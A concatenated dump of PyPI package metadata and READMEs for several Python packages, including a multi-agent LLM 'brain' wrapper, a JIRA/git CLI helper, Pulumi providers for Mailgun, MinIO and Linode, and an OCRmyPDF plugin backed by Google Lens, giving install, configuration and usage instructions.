```
> For the web UI, install the optional extra: `pip install brain-system[web]`
## 🚀 Quick Start — Library Usage
```python
from brain_system import BrainWrapper
# Create a Brain (choose provider: "gemini", "openai", or "ollama")
brain = BrainWrapper(provider="ollama", model_name="mistral")
# Process input through all 5 agents
result = brain.think("What is the meaning of justice?")
# Get the final synthesized response
print(result.response)
# Inspect individual agent signals
print(result.sensory) # Thalamus — input classification
print(result.memory) # Hippocampus — memory context
print(result.logic) # Frontal Lobe — logical analysis
print(result.emotional) # Amygdala — emotional analysis
```
### Persona Mode
Use a pre-curated persona or upload a biography/autobiography (`.txt` or `.pdf`):
```python
# Discover available personas
for p in brain.list_personas():
print(f"{p['emoji']} {p['name']} → ID: {p['id']}")
# Pre-curated persona — loads instantly, no LLM call
brain.load_persona("gandhi") # by ID
brain.load_persona("einstein")
# Custom persona — pass a file path
brain.load_persona("gandhi_autobiography.pdf")
result = brain.think("How should we deal with injustice?")
print(result.response) # Responds in persona's voice
brain.clear_persona() # Revert to default
```
### Memory Management
```python
# Custom memory file location
brain = BrainWrapper(provider="gemini", memory_path="./my_memory.json")
# Clear all stored memories
brain.clear_memory()
```
### 🔌 Wrap Your Own Agent
Already have an agent? Wrap it with Brain's cognitive pipeline using `AgentWrapper`. Your function receives a `BrainContext` with all four preprocessing agent signals:
```python
from brain_system import AgentWrapper, BrainContext
def my_agent(query: str, ctx: BrainContext) -> str:
"""Your agent logic — use brain signals however you want."""
return f"Logic: {ctx.logic[:200]}\nEmotion: {ctx.emotional[:200]}"
agent = AgentWrapper(my_agent, provider="openai")
result = agent.run("Should AI be regulated?")
print(result.response) # Your agent's response
print(result.sensory) # Brain's sensory signal (also available)
```
Also works as a **decorator**:
```python
@AgentWrapper(provider="ollama", model_name="mistral")
def my_agent(query: str, ctx: BrainContext) -> str:
return f"Based on logic: {ctx.logic[:200]}"
result = my_agent("What is justice?")
```
### API Reference
| Class / Method | Description |
|:---|:---|
| `BrainWrapper(provider, model_name, memory_path)` | Create a standalone Brain instance |
| `.think(input) → BrainResult` | Process input through the 5-agent pipeline |
| `.load_persona(id_or_path)` | Load a pre-curated persona by ID or a custom `.txt`/`.pdf` |
| `.list_personas()` | Returns list of available pre-curated persona dicts |
| `.clear_persona()` | Remove the active persona |
| `.clear_memory()` | Erase all long-term memories |
| `.persona_active` | `bool` — is a persona loaded? |
| `.persona_name` | Name of the active persona |
| `AgentWrapper(agent_fn, provider, ...)` | Wrap your agent with brain processing |
| `.run(input) → BrainResult` | Run brain + your agent |
| `BrainContext` | Dataclass with `.query`, `.sensory`, `.memory`, `.logic`, `.emotional` |
| `BrainResult.response` | Final synthesized response |
| `BrainResult.agent_signals` | `dict` of each agent's raw output |
| `BrainResult.sensory / .memory / .logic / .emotional` | Shortcut accessors |
See [`examples/`](examples/) for complete usage scripts.
---
## 🖥️ Development Setup
### Clone & Install
```bash
git clone https://github.com/shivamtyagi18/BRAIN.git
cd BRAIN
pip install -e ".[web,dev]"
```
### Configure (Optional)
Create a `.env` file in the project root for cloud providers:
```env
# Only needed if using Gemini or OpenAI
GOOGLE_API_KEY=your_key_here
OPENAI_API_KEY=your_key_here
```
> **No API key needed for Ollama** — runs entirely on your local machine.
### Run
#### Web UI
```bash
python -m brain_system.app
```
Open **http://localhost:5001** in your browser.
#### Command Line
```bash
brain-cli
```
## 🖥️ Web Interface
The web UI features:
- **Provider selection** — choose Gemini, OpenAI, or Ollama at startup
- **Pre-curated personas** — pick from 8 famous personalities in a card grid
- **Custom persona upload** — drag & drop a `.txt` or `.pdf` biography
- **Live chat** — dark-mode interface with agent activity indicators
- **Agent transparency** — expand each agent's internal reasoning with "Show agent signals"
- **Mid-conversation persona switching** — change or clear persona without restarting
- **New Chat** — full reset button to start fresh
- **Clear Memory** — wipe stored memories without restarting
## 🤖 Supported LLM Providers
| Provider | Requirements | Best For |
|:---------|:-------------|:---------|
| **Ollama** | [Ollama](https://ollama.ai) installed locally | Privacy, offline use, no cost |
| **Gemini** | `GOOGLE_API_KEY` in `.env` | High-quality responses |
| **OpenAI** | `OPENAI_API_KEY` in `.env` | GPT-4 class models |
### Using Ollama (Local)
```bash
# Install Ollama, then pull a model:
ollama pull mistral
# For uncensored output, try:
ollama pull dolphin-mistral
```
## 📁 Project Structure
```
brain-system/
├── pyproject.toml # Package config & dependencies
├── run.sh # Single-command launcher
├── examples/
│ ├── basic_usage.py # Minimal library usage
│ ├── persona_mode.py # Persona loading example
│ └── custom_provider.py # Provider switching example
└── brain_system/
├── __init__.py # Public API exports
├── wrapper.py # BrainWrapper — developer entry point
├── app.py # Flask web server (optional)
├── main.py # CLI entry point
├── agents/
│ ├── base_agent.py # Abstract base with persona injection
│ ├── sensory_agent.py # Input parsing (Thalamus)
│ ├── memory_agent.py # Context retrieval (Hippocampus)
│ ├── emotional_agent.py # Sentiment analysis (Amygdala)
│ ├── logic_agent.py # Reasoning (Frontal Lobe)
│ └── executive_agent.py # Decision synthesis (PFC)
├── core/
│ ├── orchestrator.py # LangGraph workflow engine
│ ├── llm_interface.py # Multi-provider LLM factory
│ ├── vector_memory.py # ZVec persona biography search
│ ├── working_memory.py # Conversation context buffer
│ ├── memory_store.py # Legacy memory (JSON)
│ ├── document_loader.py # TXT/PDF document ingestion
│ └── persona.py # Persona extraction & injection
├── personas/
│ ├── __init__.py # Package exports
│ └── persona_registry.py # 8 pre-curated famous persona profiles
└── web/
├── templates/index.html # Chat interface
└── static/
├── css/style.css # Dark-mode theme
└── js/app.js # Frontend logic
```
## 🔧 Architecture Highlights
- **LangGraph Orchestration** — Agents run as nodes in a compiled state graph with parallel execution for Memory, Logic, and Emotional processing
- **Modular LLM Factory** — Swap providers with a single parameter; no code changes needed
- **Dual Memory Architecture** — Working Memory (conversation buffer) + ZVec-powered Hippocampus (semantic persona biography search with 384-dim sentence transformer embeddings)
- **Persona Injection** — Role-specific context: each agent gets *different* aspects of the persona profile tailored to its function
## 🤝 Contributing
Contributions are welcome! Some ideas:
- **Additional agents** — Add a Creativity Agent, Social Agent, or Moral Reasoning Agent
- **Streaming responses** — Real-time token streaming in the web UI
- **Multi-turn persona** — Let the persona evolve based on the conversation
- **Voice interface** — Add speech-to-text input and text-to-speech output
- **RAG over full books** — Index entire autobiographies (not just profiles) for deeper persona embodiment
## 📝 License
MIT License — see [LICENSE](LICENSE) for details.
---
<div align="center">
<i>Built with 🧠 by mapping neuroscience to multi-agent AI</i>
</div>
| text/markdown | null | Shivam Tyagi <shivamtyagi18@gmail.com> | null | null | MIT | agents, ai, brain, cognitive, langchain, langgraph, multi-agent | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"langchain",
"langchain-community",
"langchain-core",
"langchain-google-genai",
"langchain-ollama",
"langchain-openai",
"langgraph",
"pypdf2",
"python-dotenv",
"zvec",
"build; extra == \"dev\"",
"twine; extra == \"dev\"",
"flask; extra == \"web\""
] | [] | [] | [] | [
"Homepage, https://github.com/shivamtyagi18/BRAIN",
"Repository, https://github.com/shivamtyagi18/BRAIN",
"Issues, https://github.com/shivamtyagi18/BRAIN/issues"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:24:06.554215 | brain_system-0.4.0.tar.gz | 425,515 | 94/b0/3ecfaed2d237460b821ddee7dfd449d9535c7575b443719ff748df738c9c/brain_system-0.4.0.tar.gz | source | sdist | null | false | 950401703b8a0d487c1f4fcc348dacd8 | b32bce13a3167ce11df487569353d27df5509f69d38a21687318aa06e2c5ce8a | 94b03ecfaed2d237460b821ddee7dfd449d9535c7575b443719ff748df738c9c | null | [
"LICENSE"
] | 219 |
2.4 | pulumi-mailgun | 3.8.0a1771568257 | A Pulumi package for creating and managing Mailgun resources. | [](https://github.com/pulumi/pulumi-mailgun/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/mailgun)
[](https://pypi.org/project/pulumi-mailgun)
[](https://badge.fury.io/nu/pulumi.mailgun)
[](https://pkg.go.dev/github.com/pulumi/pulumi-mailgun/sdk/v3/go)
[](https://github.com/pulumi/pulumi-mailgun/blob/master/LICENSE)
# Mailgun Resource Provider
The Mailgun resource provider for Pulumi lets you manage Mailgun resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://www.mailgun.com//).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/mailgun
or `yarn`:
$ yarn add @pulumi/mailgun
### Python
To use from Python, install using `pip`:
$ pip install pulumi_mailgun
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-mailgun/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Mailgun
## Configuration
The following configuration points are available:
- `mailgun:apikey` - (Required) Key used to authentication to the Mailgun API. May be set via the `MAILGUN_API_KEY` environment variable.
## Reference
For further information, please visit [the Mailgun provider docs](https://www.pulumi.com/docs/intro/cloud-providers/mailgun) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/mailgun).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, mailgun | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-mailgun"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:24:05.250303 | pulumi_mailgun-3.8.0a1771568257.tar.gz | 23,262 | f0/07/b9b6f283949dee5234f2339b930954d07238851715096ae425c818414b5f/pulumi_mailgun-3.8.0a1771568257.tar.gz | source | sdist | null | false | 9bbcff83016483ac3724abd85496b418 | c710ff37f8a60d6bb7e7c4911217232b19b7722ce3d2bcd273c73bef48bcf57d | f007b9b6f283949dee5234f2339b930954d07238851715096ae425c818414b5f | null | [] | 190 |
2.4 | jira-git-helper | 0.9.0 | JIRA ticket context manager for git workflows | # jira-git-helper
A terminal-based JIRA ticket context manager for git workflows, invoked as `jg`.
`jg` keeps track of which JIRA ticket you're working on so that branch names,
commit messages, and PR lookups are automatically prefixed — without you having
to type the ticket key every time.
## How it works
`jg` maintains an **active ticket** for each terminal session (e.g. `SWY-1234`).
Once set, commands like `jg commit`, `jg branch`, and `jg push` automatically use
that ticket — you never have to copy-paste it again.
```
$ jg set # pick a ticket interactively
$ jg branch fix # creates SWY-1234-fix and switches to it
$ jg add # stage files and commit — ticket prefix added automatically
$ jg push # pushes branch and opens the linked PR
```
Each terminal window can track a different ticket independently.
---
## Installation
```sh
uv tool install jira-git-helper
```
Or with pipx:
```sh
pipx install jira-git-helper
```
---
## Quick start
**1. Connect to JIRA**
```sh
jg config set server https://yourcompany.atlassian.net
jg config set email you@yourcompany.com
jg config set token <your-jira-api-token>
```
Generate a token at: https://id.atlassian.com/manage-profile/security/api-tokens
**2. Set up the shell hook**
The hook lets each terminal track its own ticket independently. See [Shell hook](#shell-hook) for full details and shell-specific instructions.
**3. (Optional) Show the active ticket in your prompt**
See [Prompt integration](#prompt-integration) for fish/Tide, bash, and zsh instructions.
**4. (Optional) Scope tickets to your projects**
```sh
jg config set projects SWY
# or multiple:
jg config set projects SWY,DOPS
```
**5. Pick a ticket and start working**
```sh
jg set # opens an interactive picker
jg # shows the active ticket at any time
```
---
## Configuration
Config is stored in `~/.config/jira-git-helper/config`. Use `jg config set/get/list` to manage it.
### Required
| Key | Description |
|---|---|
| `server` | Your JIRA instance URL, e.g. `https://yourcompany.atlassian.net` |
| `email` | Your JIRA account email |
| `token` | Your JIRA API token |
### Optional
| Key | Description |
|---|---|
| `projects` | Comma-separated project keys to scope the ticket picker, e.g. `SWY` or `SWY,DOPS` |
| `jql.<PROJECT>` | Custom JQL for a specific project (see below) |
### Project scoping
Without `projects` set, `jg set` shows all tickets assigned to you across JIRA.
With `projects` set, results are scoped to just those projects:
```sh
# Single project
jg config set projects SWY
# Multiple projects — results from all projects are merged into one list
jg config set projects SWY,DOPS
```
### Per-project JQL
By default each project uses:
```
project = <KEY> AND assignee = currentUser() ORDER BY updated DESC
```
Override this for any project with a `jql.<PROJECT>` key:
```sh
jg config set jql.SWY "project = SWY AND sprint in openSprints() AND assignee = currentUser()"
jg config set jql.DOPS "project = DOPS AND status != Done AND assignee = currentUser()"
```
**JQL resolution order** (for a given project key):
1. `jql.<PROJECT>` — if set, this wins
2. `project = PROJECT AND assignee = currentUser() ORDER BY updated DESC` — default
When multiple projects are configured and none have custom JQL, a single combined
JIRA query is used. If any project has custom JQL, one query per project is run and
results are merged.
### View your current config
```sh
jg config list
```
This shows all standard keys plus any `jql.<PROJECT>` keys you've set.
---
## Shell hook
The hook does three things:
1. **Seeds `JG_TICKET`** from the last-used ticket when a new shell opens (so you
don't start from scratch every time).
2. **Keeps terminals isolated** — `jg set` in one terminal updates only that
terminal's `JG_TICKET`. Other open terminals are unaffected.
3. **Updates `JG_TICKET`** after `jg set` or `jg branch --all`, and clears it after
`jg clear`.
Without the hook, all terminals share the same ticket via the state file.
Fish — add to `~/.config/fish/config.fish`:
```fish
eval (jg hook)
```
Bash — add to `~/.bashrc`:
```sh
eval "$(jg hook --shell bash)"
```
Zsh — add to `~/.zshrc`:
```sh
eval "$(jg hook --shell zsh)"
```
---
## Prompt integration
### Fish / Tide
Display the active ticket in your [Tide](https://github.com/IlanCosman/tide) prompt.
Run once to install the prompt item:
```sh
jg setup
```
Then follow the printed instructions to add `jg` to your Tide prompt items.
> The `jg setup` command writes `~/.config/fish/functions/_tide_item_jg.fish`, which
> reads the shell-local `$JG_TICKET` variable — so each terminal shows its own ticket.
### Bash
The hook defines a `__jg_ps1` helper. Splice it into your `PS1` in `~/.bashrc`
(after the `eval` line):
```sh
PS1='$(__jg_ps1)\$ '
```
Or anywhere inside an existing prompt string, e.g.:
```sh
PS1='\u@\h $(__jg_ps1)\$ '
```
### Zsh
Same helper, different variable. Add to `~/.zshrc` (after the `eval` line):
```sh
PROMPT='$(__jg_ps1)%% '
```
`__jg_ps1` prints the active ticket followed by a space, or nothing if no ticket is set.
---
## Commands
### `jg`
Show the active ticket for the current session.
```sh
$ jg
SWY-1234
```
---
### `jg set [TICKET]`
Set the active ticket. With no argument, opens an interactive picker that fetches
tickets from JIRA based on your configured projects and JQL.
```sh
jg set # interactive picker
jg set SWY-1234 # set directly without opening the picker
```
**Flags:**
| Flag | Description |
|---|---|
| `--jql "..."` | Use a raw JQL query instead of configured project JQL. Useful for one-off searches without changing your config. |
| `--max N` | Maximum number of tickets to fetch (default: `200`) |
**Examples:**
```sh
# Show only high-priority tickets, one-off
jg set --jql "project = SWY AND priority = Highest ORDER BY created DESC"
# Fetch more results than the default
jg set --max 500
```
**Interactive picker controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between tickets |
| `/` | Open filter bar — type to narrow by key, summary, assignee, or status |
| `Enter` | Select the highlighted ticket (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
---
### `jg clear`
Clear the active ticket for the current session.
```sh
jg clear
```
---
### `jg info [TICKET]`
Show a rich summary panel for a ticket, including: summary, status, priority,
assignee, reporter, labels, URL, and a description excerpt (truncated at 800 chars).
```sh
jg info # uses the active ticket
jg info SWY-5678 # look up any ticket by key
```
---
### `jg open [TICKET]`
Open a ticket in your browser.
```sh
jg open # opens the active ticket
jg open SWY-5678 # open any ticket by key
```
---
### `jg branch [name]`
Work with git branches scoped to the active ticket.
**With no arguments** — opens an interactive branch picker showing all local branches
that match the active ticket key. Selecting one switches to it.
```sh
jg branch
```
**With a name** — creates a new branch named `TICKET-branch-name` (using `git switch -C`)
and switches to it.
```sh
jg branch my-feature # creates SWY-1234-my-feature
```
**With `--all`** — shows all local branches matching any of your configured projects,
regardless of the active ticket. Selecting a branch also sets the active ticket to
match the ticket key embedded in the branch name.
```sh
jg branch --all # requires `projects` to be configured
```
| Flag | Description |
|---|---|
| `--all` | Browse all project branches and update the active ticket to match |
> **Note:** `--all` requires `projects` to be configured.
> Branch names are expected to follow the `PROJECT-1234-description` convention.
**Interactive picker controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between branches |
| `/` | Open filter bar — type to narrow by branch name |
| `Enter` | Switch to the highlighted branch (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
---
### `jg add`
An interactive TUI for staging files and committing — all in one step.
```sh
jg add
```
The screen is split into up to three sections (staged, modified, untracked). Use `Space`
to toggle files between staged/unstaged, then `Enter` to open the commit message
prompt. The commit message is automatically prefixed with the active ticket key.
**Controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between files |
| `Space` | Stage or unstage the highlighted file |
| `/` | Open filter bar for the focused section |
| `Enter` | Open commit message prompt (or confirm filter and return to list) |
| `Escape` | Close filter / cancel |
> **Note:** If no ticket is set, `jg add` will prompt you to pick one interactively before proceeding.
---
### `jg commit <message>`
Commit with the active ticket key automatically prepended to the message.
```sh
jg commit "fix login redirect"
# runs: git commit -m "SWY-1234 fix login redirect"
```
Any extra arguments after the message are passed through to `git commit`:
```sh
jg commit "fix login redirect" --no-verify
jg commit "fix login redirect" --amend
```
> **Note:** Refuses to run on `main` or `master`. Use `jg branch <name>` to create a feature branch first.
---
### `jg push`
Push the current branch to origin (`git push -u origin HEAD`) and open the linked
PR in your browser.
```sh
jg push
```
After pushing, `jg push` looks up the active ticket in JIRA to find any linked open
PR. If found, it opens that PR. If not found but GitHub printed a "Create a pull
request" URL during the push, it opens that instead.
---
### `jg prs [TICKET]`
Browse all GitHub PRs linked to a ticket in an interactive TUI, with inline diff viewing.
```sh
jg prs # uses the active ticket
jg prs SWY-5678 # browse PRs for any ticket
```
Columns shown: Status, Author, Repo, Source branch, Title. PRs are sorted with open
ones first, then by last-updated date. Status is colour-coded: green (open), yellow
(draft), blue (merged), red (declined).
**Controls:**
| Key | Action |
|---|---|
| `↑` / `↓` | Move between PRs |
| `/` | Open filter bar — searches status, author, repo, branch, and title |
| `o` | Open the highlighted PR in your browser |
| `d` | View the PR diff inline |
| `Escape` | Close filter / quit |
**Diff viewer:**
Press `d` on any PR (open or merged) to open a full-screen diff viewer. If
[`delta`](https://github.com/dandavison/delta) is installed it is used for
syntax-aware colouring; otherwise Rich syntax highlighting is applied.
| Key | Action |
|---|---|
| `↑` / `↓` | Scroll the diff |
| `/` | Open search bar — type a term and press `Enter` to commit the search |
| `Enter` | Jump to the next match (cycles through all matches) |
| `n` | Jump to the next file in the diff |
| `p` | Jump to the previous file in the diff |
| `Escape` | Clear active search, or close the diff viewer |
An active search is shown in an amber status bar above the footer, displaying the
search term and current position (e.g. `Search: foo 3/7 matches — Enter next Esc clear`).
All matches are highlighted inline. Press `Escape` once to clear the search, and
again to close the diff viewer.
> **Requires:** [`gh` CLI](https://cli.github.com) installed and authenticated.
---
### `jg config get <key>`
Print a single config value.
```sh
jg config get server
jg config get jql.SWY
```
Exits with a non-zero status if the key is not set.
---
### `jg config set <key> <value>`
Set a config value. Standard keys are `server`, `email`, `token`, and `projects`.
Use `jql.<PROJECT>` to set per-project JQL:
```sh
jg config set server https://yourcompany.atlassian.net
jg config set email you@yourcompany.com
jg config set token <api-token>
jg config set projects SWY,DOPS
jg config set jql.SWY "project = SWY AND sprint in openSprints() AND assignee = currentUser()"
```
---
### `jg config list`
List all configured values. Masks the `token` value for safety. Automatically
shows any `jql.<PROJECT>` keys you have set.
```sh
jg config list
```
---
### `jg hook [--shell fish|bash|zsh]`
Print the shell hook function to stdout. Intended to be evaluated in your shell
startup file (see [Shell hook](#shell-hook) above).
```sh
jg hook # fish (default)
jg hook --shell bash
jg hook --shell zsh
```
| Flag | Description |
|---|---|
| `--shell fish\|bash\|zsh` | Shell to emit the hook for (default: `fish`) |
The bash/zsh hook also defines `__jg_ps1` for prompt integration (see
[Prompt integration](#prompt-integration)).
---
### `jg setup`
Configure fish/Tide prompt integration. Creates
`~/.config/fish/functions/_tide_item_jg.fish` and prints the follow-up `set -U`
commands needed to activate and style the prompt item.
```sh
jg setup
```
> Fish/Tide only. For bash/zsh prompt integration, see [Prompt integration](#prompt-integration).
---
### `jg version`
Print the installed version.
```sh
jg version
# or
jg --version
```
---
## Requirements
- Python 3.10+
- `gh` CLI — required for PR diff viewing in `jg prs` — https://cli.github.com
---
## License
MIT
| text/markdown | Ross Cousens | null | null | null | MIT | cli, developer-tools, git, jira, workflow | [
"Development Status :: 3 - Alpha",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Version Control",
"Topic :: Utilities"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.3.1",
"jira>=3.10.5",
"requests>=2.32.0",
"textual>=8.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/YOUR_USERNAME/jira-git-helper",
"Bug Tracker, https://github.com/YOUR_USERNAME/jira-git-helper/issues"
] | uv/0.10.3 {"installer":{"name":"uv","version":"0.10.3","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"macOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null} | 2026-02-20T06:23:56.136082 | jira_git_helper-0.9.0.tar.gz | 29,120 | 35/5b/0bb98ae24eba76f636fe9e564ec01dcce0842cbcafa75ea7b2aeb68860ff/jira_git_helper-0.9.0.tar.gz | source | sdist | null | false | dd2e356bab17f706c43dba13a4ba9854 | a869f41b85add2cc5c0fafdb3e80e71343d4e1480da781cb1304a36fbf17887f | 355b0bb98ae24eba76f636fe9e564ec01dcce0842cbcafa75ea7b2aeb68860ff | null | [
"LICENSE"
] | 209 |
2.4 | pulumi-minio | 1.0.0a1771568231 | A Pulumi package for creating and managing minio cloud resources. | [](https://github.com/pulumi/pulumi-minio/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/minio)
[](https://pypi.org/project/pulumi-minio)
[](https://badge.fury.io/nu/pulumi.minio)
[](https://pkg.go.dev/github.com/pulumi/pulumi-minio/sdk/go)
[](https://github.com/pulumi/pulumi-minio/blob/master/LICENSE)
# Minio Resource Provider
The Minio Resource Provider lets you manage releases in a Minio installation.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/minio
or `yarn`:
$ yarn add @pulumi/minio
### Python
To use from Python, install using `pip`:
$ pip install pulumi_minio
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-minio/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Minio
## Configuration
The following configuration points are available:
* `minio:minioServer` - (Required) Minio Host and Port. It must be provided, but
it can also be sourced from the `MINIO_ENDPOINT` environment variable
* `minio:minioAccessKey` - (Required) Minio Access Key. It must be provided, but
it can also be sourced from the `MINIO_ACCESS_KEY` environment variable
* `minio:minioSecretKey` - (Required) Minio Secret Key. It must be provided, but
it can also be sourced from the `MINIO_SECRET_KEY` environment variable
* `minio:minioRegion` - (Optional) Minio Region (`default: us-east-1`).
* `minio:minioApiVersion` - (Optional) Minio API Version (type: string, options: `v2` or `v4`, default: `v4`).
* `minio:minioSsl` - (Optional) Minio SSL enabled (default: `false`). It can also be sourced from the
`MINIO_ENABLE_HTTPS` environment variable
## Reference
For further information, please visit [the Minio provider docs](https://www.pulumi.com/docs/intro/cloud-providers/minio)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/minio).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, minio | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-minio"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:23:49.576101 | pulumi_minio-1.0.0a1771568231.tar.gz | 25,454 | 21/37/e8d33dcbc685b217abb4021ea86135c9fd9c5d3a5d03e05ec81f30f25976/pulumi_minio-1.0.0a1771568231.tar.gz | source | sdist | null | false | 72c641eb1b963a2713dc7a6520c2f8c6 | 5dec1ec06327f93439a23a7764a9f2c5827513950563f6fd859f39e623bf21e8 | 2137e8d33dcbc685b217abb4021ea86135c9fd9c5d3a5d03e05ec81f30f25976 | null | [] | 189 |
2.4 | pulumi-linode | 5.8.0a1771568163 | A Pulumi package for creating and managing linode cloud resources. | [](https://github.com/pulumi/pulumi-linode/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/linode)
[](https://pypi.org/project/pulumi-linode)
[](https://badge.fury.io/nu/pulumi.linode)
[](https://pkg.go.dev/github.com/pulumi/pulumi-linode/sdk/v4/go)
[](https://github.com/pulumi/pulumi-linode/blob/master/LICENSE)
# Linode Resource Provider
The Linode resource provider for Pulumi lets you use Linode resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/linode
or `yarn`:
$ yarn add @pulumi/linode
### Python
To use from Python, install using `pip`:
$ pip install pulumi_linode
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-linode/sdk/v4
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Linode
## Configuration
The following configuration points are available:
- `linode:token` - (Required) This is your Linode APIv4 Token. May be specified using the `LINODE_TOKEN` environment variable.
- `linode:url` - (Optional) The HTTP(S) API address of the Linode API to use. May be specified using the `LINODE_URL` environment variable.
- `linode:uaPrefix` - (Optional) An HTTP User-Agent Prefix to prepend in API requests. May be specified using the `LINODE_UA_PREFIX` environment variable.
## Reference
For further information, please visit [the Linode provider docs](https://www.pulumi.com/docs/intro/cloud-providers/linode) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/linode).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, linode | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-linode"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:23:46.118620 | pulumi_linode-5.8.0a1771568163.tar.gz | 392,803 | b1/f4/6bd36f4d9fb945bcd83b67fc85a8b6a1f16c077e8303f4e4011c5699a2f1/pulumi_linode-5.8.0a1771568163.tar.gz | source | sdist | null | false | 5dcf7908739e4b0bfa9b3e65fdb1f4d9 | 9a3e4f1810ef5f1f286d7b406dbb96d8de673fc4d99c42359b910e40f1c884b3 | b1f46bd36f4d9fb945bcd83b67fc85a8b6a1f16c077e8303f4e4011c5699a2f1 | null | [] | 193 |
2.4 | ocrmypdf-chromelens-ocr | 1.0.7 | OCRmyPDF plugin using Google Lens API for OCR | # OCRmyPDF-ChromeLens-Ocr
OCRmyPDF plugin that uses Google Lens (`v1/crupload`) as OCR backend.
## What It Does
- Sends rasterized page images to Google Lens and parses protobuf response into hOCR + text.
- Preserves hierarchical layout (paragraphs/lines/words), including rotation metadata (`textangle` in hOCR lines).
- Handles word separators from Lens response for better spacing fidelity.
- Includes optional de-hyphenation for line-broken words.
- Tries to preserve superscript glyphs (for example `¹²³`) by overriding OCRmyPDF's NFKC normalization path.
## Installation
Prerequisite: install `ocrmypdf`.
Install from Git:
```bash
pip install git+https://github.com/atlantos/OCRmyPDF-ChromeLens-Ocr.git
```
Install from PyPI:
```bash
pip install ocrmypdf-chromelens-ocr
```
## Usage
Basic usage:
```bash
ocrmypdf --plugin ocrmypdf_chromelens_ocr input.pdf output.pdf
```
Debug dump example:
```bash
ocrmypdf \
--plugin ocrmypdf_chromelens_ocr \
--keep-temporary-files \
--chromelens-dump-debug \
input.pdf output.pdf
```
## Plugin CLI Options
| Option | Description | Default |
| :--- | :--- | :--- |
| `--chromelens-no-dehyphenation` | Disable de-hyphenation across adjacent lines. | `false` |
| `--chromelens-max-dehyphen-len` | Max prefix/suffix length threshold for de-hyphenation merge. | `10` |
| `--chromelens-dump-debug` | Write raw request/response + parsed layout artifacts next to `*_ocr_hocr.*` temp files. Works only with `--keep-temporary-files`. | `false` |
## Current Implementation Defaults
These are hardcoded in `src/ocrmypdf_chromelens_ocr/plugin.py`:
- Upload format: `JPEG`
- JPEG quality: `95`
- Max upload long edge:
- OCRmyPDF v16: `1600`
- OCRmyPDF v17+: `1200`
- Fixed request locale/context:
- language `en`, region `US`, timezone `America/New_York`
- Chrome-style request headers:
- `x-browser-channel`, `x-browser-year`, `x-browser-copyright`, `x-browser-validation`
Note: OCRmyPDF language flags (`-l/--language`) are not propagated to Lens request context; Lens auto-detection is relied on.
## Compatibility
- Python `>=3.9`
- OCRmyPDF `>=16.0.0`
- Tested with OCRmyPDF 16 and 17 code paths
## Limitations
- Uses undocumented/private Google API and may break without notice.
